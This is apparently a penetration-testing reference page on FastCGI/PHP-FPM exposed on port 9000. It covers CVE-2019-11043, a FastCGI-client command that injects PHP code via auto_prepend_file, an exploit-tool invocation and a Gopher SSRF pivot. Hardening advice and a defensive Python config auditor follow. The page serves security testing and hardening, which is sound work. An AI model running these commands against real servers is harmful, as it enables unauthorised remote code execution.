SERVICE 9000/tcp

FastCGI / PHP-FPM

aka php-fpm, fcgi

FastCGI (PHP-FPM) on 9000 is meant to be internal-only. Reachable directly — or via SSRF — it executes arbitrary PHP, and CVE-2019-11043 is a remote PHP-FPM RCE on certain nginx configs.

Ports

Port   Proto   Notes
9000   tcp     FastCGI / PHP-FPM

Fingerprint

  • Raw FastCGI protocol on 9000 (not HTTP)
  • Backend behind an nginx/Apache front end

Known CVEs

CVE              Impact
CVE-2019-11043   PHP-FPM + nginx misconfig → unauthenticated RCE

Exploitation primitives

  • Direct/SSRF access to 9000 → run PHP via a FastCGI client (set PHP_VALUE auto_prepend_file)
  • CVE-2019-11043: crafted request length triggers RCE on vulnerable nginx+FPM
  • Reach it through a Gopher SSRF when only the web port is exposed

Overview

FastCGI/PHP-FPM on 9000 is the PHP execution backend. It assumes only the local web server talks to it, so direct or SSRF access is straight code execution.

Enumeration

Confirm something’s on 9000 (it won’t speak HTTP):

nmap -p9000 -sV <TARGET>

Execute PHP via a FastCGI client

Run a known script path with injected PHP (auto_prepend_file trick):

fcgi-client.py -host <TARGET> -port 9000 -filepath /var/www/html/index.php -code '<?php system("id"); ?>'

CVE-2019-11043 (PHP-FPM + nginx)

php-fpm_exploit -u http://<TARGET>/index.php

SSRF route

If only the web app is reachable, pivot through a Gopher SSRF (gopherus → fastcgi) to hit 127.0.0.1:9000.

Hardening

Bind PHP-FPM to a UNIX socket or localhost only, patch CVE-2019-11043, and validate SCRIPT_FILENAME.
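
A config check for the bind and script-validation points above, as an added example that is not part of the original page: it parses PHP-FPM pool config and flags listen values that are neither a UNIX socket nor a loopback address, exposed TCP listeners with no listen.allowed_clients, and an empty security.limit_extensions (the FPM-side limit on which script files may execute). The sample config, function names and finding labels are constructed for illustration.

```python
import ipaddress
# Constructed php-fpm pool config used as sample input (not from the page).
SAMPLE = """\
[www]
listen = 0.0.0.0:9000
;listen.allowed_clients = 127.0.0.1
security.limit_extensions =
[api]
listen = /run/php/api.sock
[legacy]
listen = 9000
"""

def parse_pools(text):
    """Return {pool: {directive: value}}; lines starting with ';' are comments."""
    pools, cur = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            cur = pools.setdefault(line[1:-1], {})
        elif cur is not None and "=" in line and not line.startswith(";"):
            key, _, val = line.partition("=")
            cur[key.strip()] = val.strip()
    return pools

def listen_kind(value):
    """Classify a listen value as 'unix', 'loopback' or 'exposed'."""
    if value.startswith("/"):
        return "unix"
    if value.isdigit():  # a bare port means every interface
        return "exposed"
    host = value.rsplit(":", 1)[0].strip("[]")
    try:
        return "loopback" if ipaddress.ip_address(host).is_loopback else "exposed"
    except ValueError:
        return "exposed"  # not an IP literal: flag for manual review

def audit(text):
    """Return (pool, finding) pairs for settings that weaken isolation."""
    out = []
    for pool, cfg in parse_pools(text).items():
        if listen_kind(cfg.get("listen", "")) == "exposed":
            out.append((pool, "listen-not-local"))
            if "listen.allowed_clients" not in cfg:
                out.append((pool, "no-allowed-clients"))
        if cfg.get("security.limit_extensions", ".php") == "":
            out.append((pool, "any-extension-executes"))
    return out

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Run it over the contents of each pool file in the FPM pool directory; a pool with no findings listens on a UNIX socket or loopback address and keeps the default extension limit.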
